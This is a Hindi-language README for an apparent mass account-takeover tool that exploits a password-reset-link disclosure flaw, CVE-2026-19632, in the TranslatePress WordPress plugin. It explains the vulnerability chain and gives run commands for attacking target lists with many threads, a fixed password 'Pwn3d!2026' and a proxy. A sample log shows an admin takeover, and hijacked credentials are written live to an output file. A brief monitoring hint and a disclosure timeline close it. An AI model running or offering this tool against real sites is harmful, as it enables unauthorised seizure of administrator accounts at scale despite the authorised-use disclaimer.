
अनधिकृत खाता अधिग्रहण PoC TranslatePress Multilingual <= 3.3.1 (WordPress) के लिए
CVE-2026-19632 के लिए सामूहिक खाता-अधिग्रहण उपकरण, जो TranslatePress – Multilingual वर्डप्रेस प्लगइन (≤ 3.3.1) में पासवर्ड रीसेट लिंक प्रकटीकरण के कारण होने वाला बिना प्रमाणीकरण के खाता अधिग्रहण है। लक्ष्य सूची के लिए एक ही कमांड — पूरी श्रृंखला स्वचालित रूप से चलती है, और हर सफल अधिग्रहण उसी क्षण आउटपुट फ़ाइल में लिखा जाता है।
अस्वीकरण — केवल अधिकृत उपयोग। यह उपकरण वास्तविक खाता पासवर्ड बदलता है और वास्तविक पासवर्ड-रीसेट ईमेल ट्रिगर करता है। इसका उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।
| CVE | CVE-2026-19632 |
| उत्पाद | TranslatePress – Multilingual (वर्डप्रेस प्लगइन, slug translatepress-multilingual), Cozmoslabs द्वारा |
| प्रभावित | सभी संस्करण ≤ 3.3.1 (400,000+ सक्रिय इंस्टॉलेशन) |
| पैच किया गया | 3.3.2 (फिक्स: सार्वजनिक डिक्शनरी AJAX हैंडलर पर current_user_can जाँच) |
| CVSS 3.1 | 9.8 CRITICAL — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (CNA: Wordfence) |
| CWE | CWE-200 (संवेदनशील जानकारी का प्रकटीकरण) + CWE-640 (कमज़ोर पासवर्ड पुनर्प्राप्ति तंत्र) |
| प्रभाव | बिना प्रमाणीकरण के एडमिन खाता अधिग्रहण |
trp_data प्रिंट करता है
जिसमें get_translations nonce शामिल होता है। लॉग-आउट आगंतुकों के लिए
nonce डिज़ाइन द्वारा सार्वजनिक होते हैं; प्लगइन सुरक्षा के लिए उन पर निर्भर करता है।wp_mail को हुक करता है
और आउटगोइंग ईमेल का प्राप्तकर्ता की भाषा में अनुवाद करता है।
जब कोई अनाम हमलावर उस एडमिन के लिए wp-login.php?action=lostpassword ट्रिगर करता है
जिसकी प्रोफ़ाइल भाषा एक प्रकाशित द्वितीयक भाषा है,
तो पूरा रीसेट ईमेल — जिसमें मान्य रीसेट कुंजी वाला सादा-पाठ wp-login.php?action=rp
URL भी शामिल है — हमलावर के अनुरोध के भीतर समकालिक रूप से
wp_trp_dictionary_<default>_<locale> में डाला जाता है। SMTP को काम करने की
आवश्यकता भी नहीं है।trp_get_translations_regular को
wp_ajax_nopriv के रूप में पंजीकृत किया गया है और, 3.3.2 से पहले, केवल सार्वजनिक nonce
सत्यापित करता था। कोई भी string_ids द्वारा डिक्शनरी की गणना कर सकता है और कुंजी निकाल सकता है।पूर्ण तकनीकी लेख: CVE-2026-19632-REPORT.md
cve-2026-19632.pyएक एकल स्व-निहित स्क्रिप्ट जो सूची में प्रत्येक लक्ष्य के लिए पूर्ण श्रृंखला निष्पादित करती है:
readme.txt फ़ॉलबैक)trp_data + भाषा-स्विचर प्रोबिंग)url|username|password जोड़ें
(फ्लश, थ्रेड-सुरक्षित, रन समाप्त होने की प्रतीक्षा नहीं)निर्मित मज़बूती:
--new-password के माध्यम से निश्चित)।pip install -r requirements.txt
# लक्ष्यों की सूची के विरुद्ध पूर्ण निष्पादन, 20 थ्रेड
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 20
# हर लक्ष्य के लिए निश्चित पासवर्ड
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --new-password 'Pwn3d!2026'
# प्रॉक्सी के माध्यम से
python cve-2026-19632.py -l targets.txt -o vuln.txt -t 10 --proxy http://127.0.0.1:8080
| विकल्प | विवरण |
|---|---|
-l, --list | प्रति पंक्ति एक लक्ष्य URL वाली फ़ाइल (# टिप्पणियाँ अनुमत) |
-o, --output | परिणाम फ़ाइल, प्रारूप url|username|password (डिफ़ॉल्ट vuln.txt) |
-t, --threads | समवर्ती कार्यकर्ता (डिफ़ॉल्ट 10) |
--new-password | सभी लक्ष्यों के लिए निश्चित पासवर्ड (डिफ़ॉल्ट: प्रति लक्ष्य यादृच्छिक 14-अक्षर) |
--timeout | प्रति-अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट 15) |
--proxy | HTTP प्रॉक्सी, जैसे http://127.0.0.1:8080 |
--no-color | रंगीन आउटपुट अक्षम करें |
लैब इंस्टेंस के विरुद्ध टर्मिनल लॉग (WordPress 7.0.4 + TranslatePress 3.3.1,
ar डिफ़ॉल्ट → en_US द्वितीयक) — मान सैनिटाइज़ किए गए:
[00:09:06] [INFO] CVE-2026-19632 takeover tool - 3 target(s), 3 thread(s)...
[00:09:06] [SKIP] http://example.com (no TranslatePress)
[00:09:07] [INFO] http://TARGET TP found - langs: ar->en_US, nonce=a1b2c3d4e5
[00:09:09] [INFO] username candidates: ['admin', ...]
[00:09:09] [WARN] attempt 1/3 failed (stale key)
[00:09:09] [WARN] attempt 2/3 failed (stale key)
[00:09:09] [WARN] attempt 3/3 failed (stale key)
[00:09:09] [INFO] all keys stale - fresh reset trigger...
[00:09:15] [TAKEOVER] http://TARGET SUCCESS - user='admin' password='Pwn3d!2026'
[00:09:15] [INFO] done. summary: ERROR=1 | SKIP=1 | TAKEOVER=1
vuln.txt (लाइव लिखा गया, सफलता के क्षण में):
http://TARGET|admin|Pwn3d!2026
vuln.txtको संवेदनशील आर्टिफैक्ट मानें — इसमें लाइव क्रेडेंशियल और/या मान्य रीसेट कुंजियाँ होती हैं। इसे.gitignoreमें जोड़ें।
आवश्यक नहीं: एक कार्यशील मेल सर्वर (URL wp_mail फ़िल्टर के भीतर,
भेजने के प्रयास से पहले संग्रहीत होता है)।
security nonce के साथ अनुक्रमिक string_ids गणना के लिए
admin-ajax.php लॉग की निगरानी करें।| दिनांक | घटना |
|---|---|
| 2026-08-12 | CVE-2026-19632 आरक्षित |
| 2026-08-13 | TranslatePress 3.3.2 फिक्स के साथ जारी |
| 2026-08-25/26 | Wordfence सलाह प्रकाशित करता है; 24 घंटों में 8,618 शोषण प्रयास अवरुद्ध |
| 2026-08-28 | ThaiCERT सलाह |
momopon1415) और Wordfence टीम, 3.3.2 चेंजलॉग में श्रेय दिया गया।MIT © 2026 ghostpel